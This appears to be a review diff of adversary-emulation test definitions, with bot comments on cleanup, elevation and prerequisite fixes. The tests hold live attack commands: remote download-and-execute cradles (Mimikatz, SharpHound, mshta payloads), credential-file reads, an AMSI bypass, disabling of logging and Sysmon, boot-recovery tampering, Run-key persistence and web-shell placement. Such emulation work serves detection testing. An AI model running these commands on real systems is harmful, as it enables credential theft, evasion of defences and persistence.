diff --git a/atomics/T1081/T1081.yaml b/atomics/T1081/T1081.yaml index 342f3b95..bc2deeae 100644 --- a/atomics/T1081/T1081.yaml +++ b/atomics/T1081/T1081.yaml @@ -31,18 +31,6 @@ atomic_tests: command: | grep -ri password #{file_path} -- name: Runs Mimikatz & Mimikittenz by name - description: | - Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module. - supported_platforms: - - windows - executor: - name: powershell - elevation_required: true - command: | - invoke-mimikittenz - mimikatz.exe - - name: Extracting passwords with findstr description: | Extracting Credentials from Files @@ -54,17 +42,16 @@ atomic_tests: command: | findstr /si pass *.xml | *.doc | *.txt | *.xls ls -R | select-string -Pattern password - -- name: Access "unattend.xml" + +- name: Access unattend.xml description: | Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. - + supported_platforms: - windows executor: name: command_prompt elevation_required: true command: | - cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1 - cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1 - + type C:\Windows\Panther\unattend.xml > nul 2>&1 + type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1 diff --git a/atomics/T1086/T1086.yaml b/atomics/T1086/T1086.yaml index 177028c8..f1b3aa51 100644 --- a/atomics/T1086/T1086.yaml +++ b/atomics/T1086/T1086.yaml @@ -6,16 +6,13 @@ atomic_tests: - name: Mimikatz description: | Download Mimikatz and dump credentials - supported_platforms: - windows - input_arguments: mimurl: description: Mimikatz url type: url default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 - executor: name: command_prompt elevation_required: true 
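Review bot: The new `type` lines in the unattend.xml test discard both stdout and stderr (`> nul 2>&1`), so a run on a host with neither Panther file present exits exactly like a successful read and nobody learns the test never touched a credential file. Dropping the `2>&1` on both lines keeps the file contents off the console while letting cmd's "cannot find the file" error surface, or add a `prereq_command` the way this same change does for the IIS logging test in T1089, e.g. `if exist C:\Windows\Panther\unattend.xml (exit 0) else (exit 1)` — I can't confirm from here whether the runner honours `prereq_command` for the `command_prompt` executor. Unrelated to the edit but visible as context above it, the findstr test's `findstr /si pass *.xml | *.doc | *.txt | *.xls` pipes into `*.doc`, `*.txt` and `*.xls` as if they were commands; a space-separated file list was presumably intended.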
@@ -25,16 +22,13 @@ atomic_tests: - name: BloodHound description: | Download Bloodhound and run it - supported_platforms: - windows - input_arguments: bloodurl: description: BloodHound URL type: url default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1 - executor: name: command_prompt elevation_required: false @@ -45,10 +39,8 @@ atomic_tests: description: | Different obfuscated methods to test Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" - supported_platforms: - windows - executor: name: powershell elevation_required: false @@ -60,10 +52,8 @@ atomic_tests: - name: Mimikatz - Cradlecraft PsSendKeys description: | Run mimikatz via PsSendKeys - supported_platforms: - windows - executor: name: powershell elevation_required: true @@ -73,12 +63,9 @@ atomic_tests: - name: Invoke-AppPathBypass description: | Note: Windows 10 only - Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ - supported_platforms: - windows - executor: name: command_prompt elevation_required: false @@ -88,10 +75,8 @@ atomic_tests: - name: PowerShell Add User description: | Using PS 5.1, add a user via CLI - supported_platforms: - windows - input_arguments: user_name: description: username to add @@ -120,16 +105,13 @@ atomic_tests: Provided by https://github.com/mgreen27/mgreen27.github.io Powershell MsXml COM object. Not proxy aware removing cache although does not appear to write to those locations - supported_platforms: - windows - input_arguments: url: description: url of payload to execute type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1 - executor: name: command_prompt elevation_required: false 
@@ -141,16 +123,13 @@ atomic_tests: Provided by https://github.com/mgreen27/mgreen27.github.io Powershell MsXml COM object. Not proxy aware removing cache although does not appear to write to those locations - supported_platforms: - windows - input_arguments: url: description: url of payload to execute type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1 - executor: name: command_prompt elevation_required: false @@ -161,16 +140,13 @@ atomic_tests: description: | Provided by https://github.com/mgreen27/mgreen27.github.io Powershell xml download request - supported_platforms: - windows - input_arguments: url: description: url of payload to execute type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml - executor: name: command_prompt elevation_required: false @@ -181,16 +157,13 @@ atomic_tests: description: | Provided by https://github.com/mgreen27/mgreen27.github.io Powershell invoke mshta to download payload - supported_platforms: - windows - input_arguments: url: description: url of payload to execute type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct - executor: name: powershell elevation_required: false @@ -201,10 +174,8 @@ atomic_tests: description: | Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. - supported_platforms: - windows - executor: name: manual steps: | @@ -214,10 +185,8 @@ atomic_tests: - name: PowerShell Fileless Script Execution description: | Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. - supported_platforms: - windows - executor: name: powershell elevation_required: false 
@@ -228,14 +197,12 @@ atomic_tests: cleanup_command: | cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f - + - name: PowerShell Downgrade Attack description: | Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ - supported_platforms: - - windows - + - windows executor: name: powershell elevation_required: false @@ -247,16 +214,13 @@ atomic_tests: - name: NTFS Alternate Data Stream Access description: | Creates a file with an alternate data stream and simulates executing that hidden code/file - supported_platforms: - windows - input_arguments: ads_file: description: File created to store Alternate Stream Data type: String default: $env:TEMP\NTFS_ADS.txt - executor: name: powershell elevation_required: false @@ -268,4 +232,3 @@ atomic_tests: Invoke-Expression $streamcommand cleanup_command: | Remove:Item #{ads_file} - diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml index 86b5e4c7..6608f7fb 100644 --- a/atomics/T1089/T1089.yaml +++ b/atomics/T1089/T1089.yaml @@ -98,7 +98,7 @@ atomic_tests: - name: Unload Sysmon Filter Driver description: | - Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. + Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. supported_platforms: - windows input_arguments: @@ -120,7 +120,7 @@ atomic_tests: - name: Disable Windows IIS HTTP Logging description: | - Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). + Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. supported_platforms: - windows 
@@ -130,17 +130,19 @@ atomic_tests: type: string default: Default Web Site executor: - name: command_prompt + name: powershell + prereq_command: | + if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1} command: | C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true + cleanup_command: | + C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false - name: Uninstall Sysmon description: | Uninstall Sysinternals Sysmon for Defense Evasion - supported_platforms: - windows - executor: name: command_prompt elevation_required: true @@ -153,11 +155,10 @@ atomic_tests: - name: AMSI Bypass - AMSI InitFailed description: | - Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. + Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ supported_platforms: - windows - executor: name: powershell elevation_required: false @@ -169,11 +170,9 @@ atomic_tests: - name: AMSI Bypass - Remove AMSI Provider Reg Key description: | With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. - This test removes the Windows Defender provider registry key. - + This test removes the Windows Defender provider registry key. supported_platforms: - windows - executor: name: powershell elevation_required: true @@ -184,7 +183,7 @@ atomic_tests: - name: Disable Arbitrary Security Windows Service description: | - With administrative rights, an adversary can disable Windows Services related to security products. + With administrative rights, an adversary can disable Windows Services related to security products. supported_platforms: - windows input_arguments: 
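Review bot: The new `prereq_command` writes `0` or `1` to the pipeline rather than setting an exit status, so if the runner gates on the process exit code (its contract is not visible here) the prerequisite check passes even when appcmd.exe is absent; `if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {exit 0} else {exit 1}` makes the result unambiguous either way. The executor as shown carries no `elevation_required`, yet `appcmd set config` rewrites applicationHost.config and fails from a non-elevated shell, so `elevation_required: true` belongs here, as the neighbouring Sysmon test declares. The added cleanup sets `/dontLog:false` unconditionally, which re-enables logging on a site where it was deliberately off before the test — fine for a lab host, but worth a sentence in the description. The test's name, description and `input_arguments` begin above the hunk.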
@@ -204,7 +203,7 @@ atomic_tests: - name: Disable PowerShell Script Block Logging description: | - An adversary may disable PowerShell Script Block Logging to avoid leaving evidence. + An adversary may disable PowerShell Script Block Logging to avoid leaving evidence. Credit to Matt Graeber (@mattifestation) for the research. supported_platforms: @@ -225,7 +224,7 @@ atomic_tests: - name: PowerShell Bypass of AntiMalware Scripting Interface description: | - An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code. + An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code. Credit to Matt Graeber (@mattifestation) for the research. supported_platforms: @@ -234,4 +233,4 @@ atomic_tests: name: powershell elevation_required: false command: | - [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) \ No newline at end of file + [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) diff --git a/atomics/T1100/T1100.yaml b/atomics/T1100/T1100.yaml index 1dc70f1f..db0d4bb9 100644 --- a/atomics/T1100/T1100.yaml +++ b/atomics/T1100/T1100.yaml @@ -8,7 +8,6 @@ atomic_tests: This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx - supported_platforms: - windows input_arguments: @@ -24,3 +23,5 @@ atomic_tests: name: command_prompt command: | xcopy #{web_shells} #{web_shell_path} + cleanup_command: | + del #{web_shell_path} diff --git a/atomics/T1107/T1107.yaml b/atomics/T1107/T1107.yaml index e4414263..240699ae 100644 --- a/atomics/T1107/T1107.yaml +++ b/atomics/T1107/T1107.yaml 
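Review bot: The added `cleanup_command` runs `del #{web_shell_path}` against the same placeholder that `xcopy` used as its destination; if that argument is a directory (xcopy's usual target, and the hunk does not show its default) `del` prompts for confirmation, which stalls an unattended run, and once confirmed removes every file in the directory rather than only the copied shell. Delete the specific copied file non-interactively instead, e.g. `del /q #{web_shell_path}\cmd.aspx` if the default source is the cmd.aspx named in the description, or add `/q` and narrow the path to whatever `web_shells` actually copies. The `input_arguments` defaults that would settle this live above the hunk.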
@@ -55,48 +55,36 @@ atomic_tests: Delete a single file from the temporary directory using cmd.exe supported_platforms: - windows - input_arguments: - file_to_delete: - description: Path of file to delete - type: Path - default: C:\Windows\Temp\victim-files-cmd\a executor: name: command_prompt elevation_required: false command: | - del /f #{file_to_delete} + echo "T1107" > %temp%\T1107.txt + del /f %temp%\T1107.txt - name: Delete an entire folder - Windows cmd description: | Recursively delete the temporary directory and all files contained within it using cmd.exe supported_platforms: - windows - input_arguments: - folder_to_delete: - description: Path of folder to delete - type: Path - default: C:\Windows\Temp\victim-files-cmd executor: name: command_prompt elevation_required: false command: | - del /f /S #{folder_to_delete} + mkdir %temp%\T1107 + rmdir /s /q %temp%\T1107 - name: Delete a single file - Windows PowerShell description: | Delete a single file from the temporary directory using Powershell supported_platforms: - windows - input_arguments: - file_to_delete: - description: Path of file to delete - type: Path - default: C:\Windows\Temp\victim-files-ps\a executor: name: powershell elevation_required: false command: | - Remove-Item -path "#{file_to_delete}" + New-Item $env:TEMP\T1107.txt + Remove-Item -path $env:TEMP\T1107.txt - name: Delete an entire folder - Windows PowerShell description: | @@ -112,7 +100,8 @@ atomic_tests: name: powershell elevation_required: false command: | - Remove-Item -path "#{folder_to_delete}" -recurse + New-Item $env:TEMP\T1107 -ItemType Directory + Remove-Item -path $env:TEMP\T1107 -recurse - name: Delete VSS - vssadmin description: | 
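Review bot: The rewritten cmd folder test creates an empty directory and removes it, so `rmdir /s /q %temp%\T1107` never deletes a file, while the test's description still promises removal of "all files contained within it"; a detection keyed on file-deletion events will not fire. Seed the directory before removing it: `mkdir %temp%\T1107` / `echo T1107 > %temp%\T1107\T1107.txt` / `rmdir /s /q %temp%\T1107`. In the single-file cmd test, `echo "T1107" > %temp%\T1107.txt` writes the quote characters into the file under cmd.exe — harmless, but `echo T1107 >` is presumably what was meant. The hunk ends inside the "Delete an entire folder - Windows PowerShell" test, whose executor continues below.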
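Review bot: `New-Item $env:TEMP\T1107 -ItemType Directory` followed by `Remove-Item -path $env:TEMP\T1107 -recurse` produces and removes an empty directory, so the `-recurse` never exercises a file deletion even though the test's description (above the hunk) advertises recursive removal of contained files. Add `New-Item $env:TEMP\T1107\T1107.txt` between the two lines, and consider `-Force` on the directory creation so a leftover from an interrupted run does not raise an "already exists" error first. The enclosing test starts outside the hunk.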
@@ -143,13 +132,14 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit /set {default} recoveryenabled no - name: wbadmin description: | - This test deletes Windows Backup catalogs. + This test deletes Windows Backup catalogs. supported_platforms: - windows executor: diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 204b2e27..ded624db 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -10,9 +10,11 @@ atomic_tests: - windows executor: name: command_prompt - elevation_required: false + elevation_required: true command: | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f + cleanup_command: | + reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f - name: Modify Registry of Local Machine - cmd description: | @@ -25,6 +27,8 @@ atomic_tests: elevation_required: true command: | reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f + cleanup_command: | + reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f - name: Modify Registry of Another User Profile description: | @@ -90,7 +94,7 @@ atomic_tests: - name: Modify registry to store logon credentials description: | - Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping) + Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping) supported_platforms: - windows executor: 
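Review bot: The bcdedit test now declares `elevation_required: true`, but the executor shown still has no `cleanup_command`, so every run leaves the host with automatic recovery disabled and boot-status failures suppressed until someone reverts it by hand — this commit adds cleanup to the T1112 tests, and this one needs it more. Add `cleanup_command: |` with `bcdedit /set {default} bootstatuspolicy displayallfailures` and `bcdedit /set {default} recoveryenabled yes`. The test's name and description sit above the hunk.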
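Review bot: Flipping `elevation_required` to `true` for a write under `HKEY_CURRENT_USER` is unnecessary — a standard user can write their own hive — and if the runner obtains elevation by switching to a separate admin account, the value lands in that account's HKCU rather than the profile under test, so the previous `elevation_required: false` was the accurate setting. The new cleanup deletes `HideFileExt` rather than restoring it; on a stock profile that value typically exists with data 1, so after cleanup Explorer falls back to its built-in default rather than the pre-test state, which is acceptable but deserves a line in the description.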
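Review bot: `SecurityHealth` under `HKLM\...\CurrentVersion\Run` is, on Windows 10, the name of the built-in autorun for the Windows Security tray (`SecurityHealthSystray.exe`), so the existing `reg add ... /f` overwrites a legitimate entry and the new `reg delete ... /f` cleanup then removes it outright instead of restoring it — after one run the host has lost that startup entry. Either use a distinct value name for the test, or have cleanup restore the original data: capture it with `reg query` before the add and write it back, or at minimum reset it to `%windir%\system32\SecurityHealthSystray.exe` (verify the path on the target build). Unchanged but visible in the hunk, `/d {some_other_executable}` is still a literal placeholder rather than an `input_arguments` reference, so the Run value points at a non-existent path.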
@@ -129,4 +133,4 @@ atomic_tests:
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
cleanup_command: |
- Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
\ No newline at end of file
+ Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
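Review bot: The re-added cleanup line repeats the parameter — `Remove-ItemProperty -Force -Path -Path #{registry_key_storage} ...` — so PowerShell fails at parameter binding and the encoded command stays in the registry after every run of this test. Change it to `Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage}`. This hunk only adds the trailing newline, so the defect predates the commit, but the line is the new side of the file and the cleanup is otherwise a no-op.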